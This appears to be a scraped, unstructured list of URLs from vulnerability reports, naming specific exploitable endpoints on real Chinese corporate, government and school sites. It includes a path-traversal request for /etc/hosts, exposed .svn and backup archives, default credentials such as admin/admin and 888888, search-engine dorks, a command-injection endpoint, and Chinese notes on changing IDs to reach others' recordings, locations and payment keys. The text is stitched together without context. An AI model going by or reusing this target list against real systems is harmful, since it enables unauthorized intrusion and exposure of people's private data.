http://labch.cumt.edu.cn:81/model/TwoGradePage/OpenScienceInfo.aspx?tblOpenScienceItemID=401 http://sys.zafu.edu.cn:81/model/center/student/LabOpen/ApparatusOpenAuditingLook.aspx?id=1054 http://210.43.24.201:8080/model/center/student/LabOpen/ApparatusOpenAuditingLook.aspx?id=1054 http://www.dajie.com/profilefeed/list?uid=9160039&filter=microblog&ajax=1&_CSRFToken=ZAkpusAQeY_pDE2xA5CLtVF_rzcnnNDaaszR9Fxd www.angoo.net,打开页面不是官方网站,而是海康管理平台页面 http://yt.linekong.com/special/festival/2009/51/news.php?article_id=10869 android:configChanges="locale|keyboardHidden|orientation|screenSize|smallestScreenSize android:label="@string/app_name android:name="com.ganji.android.action.WebViewActivity android:screenOrientation="portrait android:name="com.ganji.android.action.VIEW_INFORMATION_MESSAGE android:name="android.intent.category.DEFAULT http://61.190.37.57:9200/adjsweb/web/admin/index/login http://61.190.37.57:9200/,管理密码也是admin/admin,可以start,stop服务; android:configChanges="locale|keyboardHidden|orientation|screenSize|smallestScreenSize android:label="@string/app_name android:name="com.ganji.android.action.WebViewActivity android:screenOrientation="portrait android:name="com.ganji.android.action.VIEW_INFORMATION_MESSAGE android:name="android.intent.category.DEFAULT http://zhibiao.hexun.com/Inventorpage/_IndexIconography_Big http://chzx.mhedu.sh.cn/bl/groupSpace/group/member_list.jsp?groupId=group05000000035 http://58.217.106.249/bl/groupSpace/group/member_list.jsp?groupId=group05000000035 http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/member_list.jsp?groupId=group04000000004 http://zjyiz.zje.net.cn/bl/groupSpace/group/member_list.jsp?groupId=group07000000047 http://www.hsjy.pte.sh.cn/bl/groupSpace/group/member_list.jsp?groupId=group19000000035 http://www.zjyk2z.net/bl/groupSpace/group/member_list.jsp?groupId=group63000000003 http://www.yk2z.ykedu.net/bl/groupSpace/group/member_list.jsp?groupId=group05000000035 http://yt.linekong.com/special/exercise/article.php?article_id=10222 http://bbs.yinker.com http://zb.suning.com http://www.daling.com http://www.daling.com/index.php?_c=order&_a=orderDetail&order_id=1241609 http://manager.tv.tcl.com/ http://www.skyworth-ea.com/sysadmin/login.aspx http://www.smasmj.com/newedos/default.aspx?role=author http://www.scdwzz.com/newedos/default.aspx?role=author http://www.rjggy.com/newedos/default.aspx?role=author http://www.zlyfyzl.cn/newedos/default.aspx?role=author http://www.yqtdmgc.com/newedos/default.aspx?role=author http://webware.hp.com/slm/orangePortal/downloadFile?filename=/index.jsp http://webware.hp.com/slm/orangePortal/downloadFile?filename=/WEB-INF/web.xml https://github.com/****/doc/blob/b7e83d64e0bcbe****18947533336bd7b96c93/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/%5B03%5D%E5%90%88%E4%BD%9C%E6%B8%A0%E9%81%93/%E4%B8%9A%E5%8A%A1%E6%8E%A5%E5%8F%A3/%5B04%5D%E5%B7%B2%E5%AF%B9%E6%8E%A5%E6%B8%A0%E9%81%93/%E5%95%86%E5%9F%8E%E5%AF%B9%E6%8E%A5/%E8%8B%8F%E5%AE%81%E6%98%93%E8%B4%AD/url.txt http://union.suning.com/aas/index/index!input.action ftp://unionfile.suning.com/ http://union.suning.com/aas/open/vistorAd.action?userId=1343832&webSiteId=0&adInfoId=2&adBookId=0&channel=11&vistURL=http://m.suning.com/&subUserEx=123 http://zb.suning.com http://218.7.239.170:81/ItemCertList.aspx?ID=0100071 http://www.spjdz.com/ItemCertList.aspx?ID=0100071 http://www.thszjz.com/ItemCertList.aspx?ID=0100071 http://www.hyjsjd.cn/ItemCertList.aspx?ID=0100071 http://www.jljszj.gov.cn/ItemCertList.aspx?ID=0100071 http://support-hk.huawei.com X9DFmSxPE_7:190618r6n L_iT0ewd:19061h66u http://bbs.qiandw.com/uc_server/ http://119.254.70.23/ ftp://soft.homelink.com.cn http://www.namex.cn/HomeLink,按照提示进行下单,用户名为homelink+店编码(例如homelinkA13001),初始密码是:888888 http://eoffice.homelink.com.cn http://www.namex.cn/HomeLink http://114.255.21.1/ http://upstudy.unionpay.com/login/login.init.do?&elnScreen=1920*1080elnScreen http://www.rzfwzx.gov.cn/workplate/ http://www.bdxzfw.cn/workplate/ http://www.cxxzfwzx.com/workplate/ http://wxxz.gov.cn/workplate/ http://www.hdxzwzx.com/workplate/ http://xz.njqsp.com:8001/workplate/ http://211.142.37.152:81/workplate/ http://211.142.37.152:88/workplate/ http://211.142.37.154:83/workplate/ http://211.142.37.152:83/workplate/ http://183.203.128.238:82/workplate/ http://211.142.41.114:82/workplate/ http://www.hbsxxzfwzx.gov.cn/workplate/ http://www.lzxzfwzx.com/workplate/ http://www.axxzfwzx.com/workplate/ http://gyxzfw.net/workplate/ http://60.220.253.153:81/workplate/ http://60.220.240.7/workplate/ http://211.142.37.152:85/workplate/ www.qxxzfwzx.com/workplate/ http://xz.njqsp.com:8001/workplate/ http://211.142.37.152:82/workplate/ https://**.**.**/complain/complain_list.phpsubid=0&pid=1 http://zhaopin.yili.com/school/ http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.bdxzfw.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.cxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://wxxz.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.hdxzwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:88/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.154:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://183.203.128.238:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.41.114:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.lzxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://www.axxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://gyxzfw.net/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://60.220.253.153:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://60.220.240.7/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:85/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= www.qxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://211.142.37.152:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= http://huawei-digitalhome.com/newsInfo.php?nid=15 http://www.phxad.com.cn/ www.phxad.com.cn http://www.phxad.com.cn http://58.213.19.200 http://122.140.81.4:8080/Login.aspx http://u.suning.com http://u.suning.com/member/personal/announce/ajaxDetail.htm http://calec.china-airlines.com/eGroupAE/p1_checkid.asp http://211.103.153.18:8091/member/user!login.jspx http://user.lvgou.com/passport/backPassword https://legendshop.tna.com.tw/web/MZPdBrand.aspx http://yjsxt.xidian.edu.cn/pub/examinee/findOptimalPlanAction.do?activityType=1 http://web.iciba.com/wap/sms/send_msg.php http://web.iciba.com/wap/sms/config.inc.php http://web.iciba.com/wap/sms/RPC.php http://www.ab-insurance.com/newsmore.asp?newsid=3499(newsid其余连接同样存在) https://github.com/favoorr/favoorr.github.io/commits/38339dc9ca93157ccdb0510f91f2195b93045274/_posts/2015-05-27-git-more-sshkeys-more-host.md https://github.com/wttyyou/tuchong/blob/e020ae253f686afef6e68f7606ee24e21b08ceb2/tuchong/Conf/test.php http://lesafe.lenovomm.com/sss/loc?&id=xxxxx http://lesafe.lenovomm.com/sss/loc?&id=xxxxx这个链接,只要将id=后面的数字替换,就可以听到别人的录音,知道别人的位置 http://bi.inspur.com/cwbase/BIAppCenter/BIModel/BIModelDetail.aspx?ID=ff08e987-c1cb-4de8-b48a-5476cee5a0c0&BIVersion=BI6.0&DBType=0 http://yckd.s.cn/ http://115.238.110.98/jmx-console/ http://mzt.12114.org.cn/LoginAction.action http://cas.hysec.com/index.jsp http://bbs.cbg.cn/config/config_global.php.bak http://demo.e.ikcrm.com/customers/180 http://u.suning.com/member/personal/announce/delete.htm?ids=1653237 http://www.hvgroup.com.cn/cw.do?actions=searchList&keywords=*&a=0.11454400490038097 https://github.com/marqio/dang/blob/6f3346b027e258c3b69091178df5ff1a287e4f72/media-cms/src/main/resources/config/mail-config.properties http://m.eloancn.com/page/findpwd_new.jsp?email=null&mobile=131******35&mid=903734&siqu=0 http://223.67.133.9:81/syxdzts/gl_fl_xiu.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_fl_xiu.asp?id= http://112.4.228.169:880/gl_fl_xiu.asp?id= http://ebook.lygfls.com/gl_fl_xiu.asp?id= http://www.hssqjy.com/dzts/gl_fl_xiu.asp?id= http://www.gyxsqex.com/tushu/gl_fl_xiu.asp?id= http://www.dhtfxx.com/tushu/gl_fl_xiu.asp?id= http://223.67.133.9:81/syxdzts/gl_fl_xiu.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_fl_xiu.asp?id= http://223.67.133.9:81/syxdzts/gl_bofangadd2.asp http://lsxnmxx.js.cn:41516/tushu/gl_bofangadd2.asp http://112.4.228.169:880/gl_bofangadd2.asp http://ebook.lygfls.com/gl_bofangadd2.asp http://www.hssqjy.com/dzts/gl_bofangadd2.asp http://www.gyxsqex.com/tushu/gl_bofangadd2.asp http://www.dhtfxx.com/tushu/gl_bofangadd2.asp http://www.dhtfxx.com/tushu/gl_bofangadd2.asp http://www.zhaokao.net/mstkcx.jsp?pid=18474&id=110786 http://zoomla.cn/zoomla.cn.rar http://124.167.232.58/home.php http://223.67.133.9:81/syxdzts/down.asp?id=1 http://lsxnmxx.js.cn:41516/tushu/down.asp?id=1 http://112.4.228.169:880/down.asp?id=1 http://ebook.lygfls.com/down.asp?id=1 http://www.hssqjy.com/dzts/down.asp?id=1 http://www.gyxsqex.com/tushu/down.asp?id=1 http://www.dhtfxx.com/tushu/down.asp?id=1 http://www.dhtfxx.com/tushu/down.asp?id=1 http://www.gyxsqex.com/tushu/down.asp?id=1 http://mensao.app.yaolan.com/mensao.app.yaolan.com.rar http://qyfz.czfb.gov.cn/zfzcxmgl/employee_toIndexJsp.do http://e.lvmama.com/ebooking/eplace/allPassportList.do http://conline.suning.com/cshop_console/login.jsp http://yun.haodai.com/ http://www.jxlife.com.cn/online/mis/download/busProcess.do?filename=206_1390353383470.pdf http://www.jxlife.com.cn/online/mis/download/busProcess.do?filename=../../../../../../../../etc/hosts nesc.cn/nesc123456 http://www.hzrsj.gov.cn/GuestBookview.asp?ID=1071 http://www.hzrsj.gov.cn/GuestBookview.asp?ID=1071 http://vb.vlinkage.com/passport/reg http://218.16.97.169 http://218.16.97.169/register.do http://cmis.inspur.com:8080/cmis/jsp/register/tcmisuser/cmisuserlogin.jsp http://cmis.inspur.com:8080/cmis/jsp/register/tcmisregst/cmisregst_read.jsp?uName=admin http://cmis.inspur.com:8080/cmis/jsp/register/tcmisregst/cmisregst_read.jsp?uName= http://cmis.inspur.com:8080/cmis/jsp/register/tcmisregst/cmisregst_read.jsp?uName=admin123 com:8080 http://dev.gionee.com/developer/login.jsp,注册开发者账号,登陆,新建一个应用,改变应用id值可查看任意商家支付秘钥和信息。也可编辑更改。 http://www.gionee.com/ http://shop.gionee.com/login_success.shtml http://www.gionee.com/op-webmap.shtml http://bd.rong360.com/bd/login.html http://**.**.**/FrameSet/Login.aspx http://bbstest.gfan.com/.svn/entries http://zhaopin.fenqile.com/。 www.rtpnr.com https://www.itouzi.com/newuser/index/forgetPwdStep2 http://wx.tclmobile.com.cn/ http://dzzb.dfstw.com/best.asp.asp http://admin.10010.com http://admin.10010.com/userApply/init.action http://rel.lenovo.com.cn/zhaoyang/gmyx.html http://123.125.89.227:8080/ base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest shipyard-cli:latest shipyard:latest rethinkdb:latest base-release:latest base-release:latest ubuntu:14.04 letv-centos6:latest letv-centos6:latest letv-centos6:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest base-release:latest sdns-image:v0.1-beta-47-g75b0060 base-release:latest base-release:latest base-release:latest base-release:latest unixbench:latest unixbench:latest base-release:latest base-release:latest base-release:latest base-release:latest docker_index:latest redis:latest registry:0.8.1 http://cq.kdnet.net/uc_server http://dgdz.xzit.edu.cn/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://182.129.150.10:8001/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://sys.zafu.edu.cn:81/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://labch.cumt.edu.cn:81/model/TwoGradePage/LabOpenRes.aspx?labID=243 http://hzhlab.hytc.edu.cn//model/TwoGradePage/LabOpenRes.aspx?labID=243 http://www.sh.e-chinalife.com:7002/app/newWebOfferServAction?method=policyDetail&policy_num=7106311401557824 http://www.sh.e-chinalife.com:7002/app/newWebOfferServAction?method=policyDetail&policy_num=7106311401557825 http://sop.suning.com/sel/settleApply/toSettleApplyInfo.action http://cms.baifendian.com/cms.zip http://id.8684.cn/.svn/entries http://218.7.239.170:81//PKPMBS/common/MessageManageList.aspx http://www.hyjsjd.cn//PKPMBS/common/MessageManageList.aspx http://www.thszjz.com//PKPMBS/common/MessageManageList.aspx http://www.csjszj.cn//PKPMBS/common/MessageManageList.aspx http://www.jljszj.gov.cn//PKPMBS/common/MessageManageList.aspx http://dxsb.qfnu.edu.cn//model/twogradepage/pgsearch.aspx http://59.69.101.10//model/twogradepage/pgsearch.aspx http://210.43.24.201:8080/model/twogradepage/pgsearch.aspx http://yqgx.zstu.edu.cn/model/twogradepage/pgsearch.aspx http://202.114.33.72/model/twogradepage/pgsearch.aspx http://remotebak.abchinalife.cn:7060/ui http://remotebak.abchinalife.cn:7060/ui/logon/LogonSubmit.jsp https://github.com/carl798/commons/blob/fb985bdb42da54455a88ff6773ea1423a8c5f43a/mail/src/main/resources/mail.properties http://jiaowu.sicau.edu.cn/web/web/web/down/list.asp?id=602 http://djyjw.sicau.edu.cn/web/web/web/down/list.asp?id=493 http://xxgc.sicau.edu.cn:8080/viledataCode.aspx?id= http://xb.sicau.edu.cn/CN/feedback/.traceImg?t= http://www.lib.sicau.edu.cn/HuJieXiTong/rulelist.asp?cid=1 http://www.lib.sicau.edu.cn/HuJieXiTong/ruleshow.asp?id=5 http://cdlib.sicau.edu.cn/cdlib/new_main_3.asp?news_ID=130 http://passport.zcool.com.cn/verifyEmail.do?name=“”&appId=1006 http://www.zcool.com.cn/special/gogoup4/ http://fangkuaiashou.zcool.com.cn/ http://passport.zcool.com.cn/verifyEmail.do?name=492736139@qq.com&appId=1006 http://www.zcool.com.cn/u/1975332 http://passport.zcool.com.cn/verifyEmail.do?name=451204869@qq.com&appId=1006 http://passport.zcool.com.cn/verfy.do?name=feng_ge_80@163.com&code=17f287028bfb1f8b9b887846d05f7a70&appId=1006 https://vpn.meizu.com http://doogua.dangdang.com:80/ http://www.zh-beidou.com/sichuanyidongchelianganquanguanlixitongrukou/ http://117.172.133.2 http://117.172.133.2/cgi-bin/upload.asp?destPath=upload/database_backup/&autoUnzip=unzip_delete http://117.172.133.2 http://icsa.dbic.com.cn/bs/bsPrdController.do?method=getPrdouKindList# http://icsa.dbic.com.cn/servlet/FileLookServlet?upfileurl=/dbicapps/accsys/card/image/1270188867403.jpg http://114.112.100.64:8080/ ftp://119.145.5.227/铁塔2015/铁塔验收模板文档/铁塔平台操作文档.docx https://www.lngmxx.com/ https://60.13.3.21/ https://58.42.250.234/ https://120.195.49.238/ https://124.163.249.126/ https://www.lngmxx.com举例,首先管理员账号 https://www.lngmxx.com/cgi-bin/webapp?op=_zj_rpbo_bafq_pelt&hid_method=edit&userid=4 http://ilife.homelink.com.cn/aigou/admin.php http://campus.chinahr.com//campus/careertalk/careerinterface.ashx?cityid=&companyname=-1 http://campus.chinahr.com//campus/careertalk/careerinterface.ashx?cityid=&companyname=1&ctid=¤tindex=1&dateid=&hyid=&Op=search&optag=&orderby=ct_id&pagesize=10&ran=0.24026559432968497&schoolname=%C7%&timeid= http://campus.chinahr.com//campus/careertalk/careerinterface.ashx?cityid=&companyname=1&ctid=¤tindex=1&dateid=&hyid=&Op=search&optag=&orderby=ct_id&pagesize=10&ran=0.24026559432968497&schoolname=%C7%&timeid= http://sqlmap.org http://www.chunshuitang.com/ http://buy.chunshuitang.com/address/select/?addid=2222 http://user.chunshuitang.com/address/edit/?addid=20000 http://proxy.tup.tsinghua.edu.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://120.132.146.200:9090/houtai/index.do http://120.132.133.245:8089/ http://www.chunshuitang.com/ https://58.42.250.234/ https://www.lngmxx.com/ https://60.13.3.21/ https://120.195.49.238/ https://124.163.249.126/ https://58.42.250.234/举例,默认账号登入 https://58.42.250.234/cgi-bin/webapp?op=_zj_orib_ilzxi_bafq_pelt&method=edit&rowid=ping http://www.sxgjj.com/Seachresult.aspx?str=a https://www.bundtrade.com/BundTrade/adm.login.forgetPassword.action http://baoliao.fanhuan.com/?shop= http://180.168.124.197/solr/ https://v.jumei.com/v1/api/login?app_id=a698e1741fe5&request_uri=https://v.jumei.com&tag=6 http://supplier.ext.jumei.com/index.php?r=Bills/purchaseOrder/IntoPacking&id=JPO031503240115 http://supplier.ext.jumei.com/index.php?r=Bills/purchaseOrder/print&id=JPO081503250081 http://www.600795.com.cn/gddltp/login.do index.php/bbs/threadlist/addmarked/ http://ucstar.jxlife.com.cn:9090/webcall/messageNoteAdd.jsp http://o2o.yummy77.com/warehouse/security/login http://oiio.yummy77.com:8090/storesB2C/login.shtml http://oiio.yummy77.com:8070/depotManage/login.shtml http://mail.gjqh.com.cn:9090/webcall/messageNoteAdd.jsp http://im.gjzq.cn:9090/webcall/messageNoteAdd.jsp http://im.gjzq.cn:9090/webcall/messageNoteAdd.jsp http://3g.jstv.com:80/hd/2014_FCWR/Do.aspx?action=GetJMDB&date=2015-1-1 http://www.wooyun.org/bugs/wooyun-2015-0119785/trace/7e869bd972ded71406d3c1989d509e53 http://www.wooyun.org/bugs/wooyun-2015-0119735/trace/689ce3e2c7781f31d56f7218252e7ae3 inurl:allnewsnr.asp?bianhao= http://220.178.213.189/web/web/web/searched.asp http://www.gzjwch.com/web/web/web/searched.asp http://125.67.64.236:6611/web/web/web/searched.asp http://182.151.215.126/web/web/web/searched.asp http://www.gzysx.com/sx/web/web/web/searched.asp http://www.gxevc.com:10333/web/web/web/searched.asp http://218.89.109.22/web/web/web/searched.asp http://supply.vivo.com.cn/examples/servlets/servlet/SessionExample;jsessionid=C44A64DEDD77CF24847E5919542A2DCE http://pop.vivo.com.cn/examples/servlets/servlet/SessionExample pop.vivo.com.cn/loginOn.action http://61.163.101.182:82/ http://218.16.97.170/ ftp://202.119.108.8/Weiyun/SysTech-2015/ ftp://202.119.108.8/Weiyun/SysTech-2015/虚拟机管理平台.docx ftp://202.119.108.8/Weiyun/SysTech-2015/服务器列表.doc www.swufe.edu.cn http://m.anoah.com/app/ladder/?c=learn&a=learnladder&clid=17&sgroup=B&pos=1 DBMS:MSQL http://www.touna.cn/web.tar.gz http://lecms.ott.letv.com/ http://119.90.56.205:8080/solr/ http://3g.inspur.com/ http://3g.inspur.com/manager/html www.chinahr.com http://180.166.208.140/Default.asp http://119.254.9.115/user.php http://119.254.9.115/2.php http://weirenwu.weibo.com/ http://mobile.inspur.com/web.rar http://remotebak.abchinalife.cn:7060/ui http://remotebak.abchinalife.cn:7060/ui/common/cvar/CExec.jsp http://m.xianguo.com/homeindex/list?cid=1&tagid=7_31 http://101.227.246.116/main!index.html http://101.227.246.116/main.html http://oa.chinatelecom-ec.com/ x.kuwo.cn/KuwoLive/getActivityRankServlet?count=10&r=0.4750313104595989&topReceId=291&topSendId=292 http://ishoway.com/flow.php?step=update_cart http://linjia.me/sharehongbao2?code=041fff862df835ff8bb9bf748e8d980U&state=382400 http://ktvpj.evideostb.com/Login.aspx http://61.133.202.178:8080/user!login.action http://61.133.202.178:8080/qwe.jsp http://epos.tianan-life.com/console/login/LoginForm.jsp http://www.wooyun.org/bugs/wooyun-2015-0119735/trace/689ce3e2c7781f31d56f7218252e7ae3 http://chzx.mhedu.sh.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://58.217.106.249/bl/groupSpace/group/group_banner.jsp?groupId= http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://zjyiz.zje.net.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://www.hsjy.pte.sh.cn/bl/groupSpace/group/group_banner.jsp?groupId= http://www.zjyk2z.net/bl/groupSpace/group/group_banner.jsp?groupId= http://www.yk2z.ykedu.net/bl/groupSpace/group/group_banner.jsp?groupId= http://chzx.mhedu.sh.cn/bl/groupSpace/group/welcome.jsp?groupId= http://58.217.106.249/bl/groupSpace/group/welcome.jsp?groupId= http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/welcome.jsp?groupId= http://zjyiz.zje.net.cn/bl/groupSpace/group/welcome.jsp?groupId= http://www.hsjy.pte.sh.cn/bl/groupSpace/group/welcome.jsp?groupId= http://www.zjyk2z.net/bl/groupSpace/group/welcome.jsp?groupId= http://www.yk2z.ykedu.net/bl/groupSpace/group/welcome.jsp?groupId= http://chzx.mhedu.sh.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://58.217.106.249/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.hszhj.pudong-edu.sh.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://zjyiz.zje.net.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.hsjy.pte.sh.cn/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.zjyk2z.net/bl/groupSpace/group/createGroup2.jsp?groupId= http://www.yk2z.ykedu.net/bl/groupSpace/group/createGroup2.jsp?groupId= http://chzx.mhedu.sh.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://58.217.106.249/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.hszhj.pudong-edu.sh.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://zjyiz.zje.net.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.hsjy.pte.sh.cn/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.zjyk2z.net/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://www.yk2z.ykedu.net/bl/personalBlog/photoshow1.jsp?blogId=bkgl&tpId=1 http://chzx.mhedu.sh.cn/be/berinfo/ber_info.jsp?berId=1271661083479 http://www.hshsh.pudong-edu.sh.cn/be/berinfo/ber_info.jsp?berId=1416984224216 http://218.78.245.222/be/berinfo/ber_info.jsp?berId=1329363377864 http://bhxx.jdedu.net/be/berinfo/ber_info.jsp?berId=1434421662489 http://czgj.hkedu.sh.cn/be/berinfo/ber_info.jsp?berId=1318560235786 http://chzx.mhedu.sh.cn/be/sys_bonus.jsp?regionFile=sh&key= http://www.hshsh.pudong-edu.sh.cn/be/sys_bonus.jsp?regionFile=sh&key= http://218.78.245.222/be/sys_bonus.jsp?regionFile=sh&key= http://bhxx.jdedu.net/be/sys_bonus.jsp?regionFile=sh&key= http://czgj.hkedu.sh.cn/be/sys_bonus.jsp?regionFile=sh&key= http://chzx.mhedu.sh.cn/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://www.hshsh.pudong-edu.sh.cn/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://218.78.245.222/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://bhxx.jdedu.net/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://czgj.hkedu.sh.cn/be/sys_credite.jsp?regionFile=&orderByStr=score_sum+desc&key= http://chzx.mhedu.sh.cn/be/ber_list.jsp?regionFile=sh&subjectId= http://www.hshsh.pudong-edu.sh.cn/be/ber_list.jsp?regionFile=sh&subjectId= http://218.78.245.222/be/ber_list.jsp?regionFile=sh&subjectId= http://bhxx.jdedu.net/be/ber_list.jsp?regionFile=sh&subjectId= http://czgj.hkedu.sh.cn/be/ber_list.jsp?regionFile=sh&subjectId= http://chzx.mhedu.sh.cn/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://www.hshsh.pudong-edu.sh.cn/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://218.78.245.222/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://bhxx.jdedu.net/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://czgj.hkedu.sh.cn/be/myber/my_bonus.jsp?regionFile=sh&uuid=20a3bb3f76ac3a2c8853071e4d886963&hflg=1 http://chzx.mhedu.sh.cn/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://www.hshsh.pudong-edu.sh.cn/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://218.78.245.222/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://bhxx.jdedu.net/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://czgj.hkedu.sh.cn/be/myber/my_download_ber.jsp?regionFile=sh&myBer=1&uuid=20a3bb3f76ac3a568853071e4d886963 http://bbs.zol.com.cn/sjbbs/d34130_132840.html http://psc.inspur.com/.svn/entries http://psc.inspur.com/ http://59.175.218.82/FQMS/login.jsp http://119.233.254.26/default.aspx http://union.lashou.com/ http://helpadmin.cnsuning.com/hc-admin-web/messageBoard/input.htm?id=1260 http://www.ptpress.cn//NewBooks.aspx?teach=j&fid=1,2%A3%AC3,4,5,6,7,8,9,11,15,16,17,99 https://github.com/***/doc x.kuwo.cn/KuwoLive/DynamicInfo http://sxedjf.bankcomm.com:80/gaoxiao/index/payf/id/4。隐隐地感觉可能存在伪静态注入,然后直接上sqlmap跑一下。 http://opda.com:808/admin/ http://dgdz.xzit.edu.cn/model/TwoGradePage/rulemanage.aspx?columnId=261 http://hzhlab.hytc.edu.cn/model/TwoGradePage/rulemanage.aspx?columnId=261 http://182.129.150.10:8001//model/TwoGradePage/rulemanage.aspx?columnId=261 http://sys.zafu.edu.cn:81/model/TwoGradePage/rulemanage.aspx?columnId=261 http://labch.cumt.edu.cn:81/model/TwoGradePage/rulemanage.aspx?columnId=261 http://open.csdn.net/ http://116.52.249.96/sjpt/login.action http://116.52.249.231/sjpt/login.action http://116.52.249.51/sjpt/login.action http://www.vmovier.com/user/forgetpwd http://www.vmovier.com/user/resetpwd?email=**@**.***&token=f321cd2871eac182554f78ab6b3bb9c3 inurl:qsksyy http://www.lcwscgs.com/qsksyy/ http://123.130.246.26:9080/qsksyy/ http://60.211.179.22:9080/qsksyy/ http://www.wfcgs.com:9080/qsksyy/ http://cgs.ytjj.gov.cn:9061/qsksyy/ http://www.dygajj.gov.cn:9080/qsksyy/ http://58.59.39.43:9080/qsksyy/ http://218.59.228.162/ http://221.2.145.164:9080 http://www.bzwscgs.com:9080 http://test.chunshuitang.com/ http://test.chunshuitang.com/ http://test.chunshuitang.com/.svn/entries http://en.zqgame.com/test.zip http://wan.160.com/wan.160.com.zip http://op.wepiao.com http://www.yingcankeji.com/news?typeid=2 http://im.suning.com/ http://qa.suning.com http://qa.suning.com/server-status http://qa.suning.com/qa-web/index.htm http://cargo.yzr.com.cn:80/ http://www.7958.com.cn/user/getpwd http://gsv.muzhiwan.com:80/ http://down.jumbotcms.net/www.rar http://help.jumbotcms.net/www.rar http://news.jumbotcms.net/www.rar http://service.jumbotcms.net/www.rar http://video.jumbotcms.net/www.rar http://www.jumbotcms.net/www.rar http://www.jlssljsxx.com/Zhaobiao/News_detail.asp?News_ID=4753&News_BigClass_ID=2 http://wechat3.cc.letv.com/EliteWebChat/jsp/letv/new/.svn/ http://tripshow.com/listing/places/?cid=14219 http://tripshow.com/listing/places/?cid=14219 http://tripshow.com/listing/hotels/?cid=14228 http://tripshow.com/listing/attractions/?cid=14216 http://www.cnfinance.cn/ http://cabf.cnfinance.cn/searchbook.php?class= http://cabf.cnfinance.cn/searchpx.php?class= http://www.cnfinance.cn/forum/forum_view.php?filter=is_jh&fid=10 http://www.cnfinance.cn/forum/forum_view.php?orderby=last_post_date&fid=10 http://cabf.cnfinance.cn/skin/default/images/shousuo.jpg/.php http://www.cnfinance.cn/forum/templates/default/images/logo.png/.php http://banner.chinesegamer.net/gamebn/abm.aspx?z=71 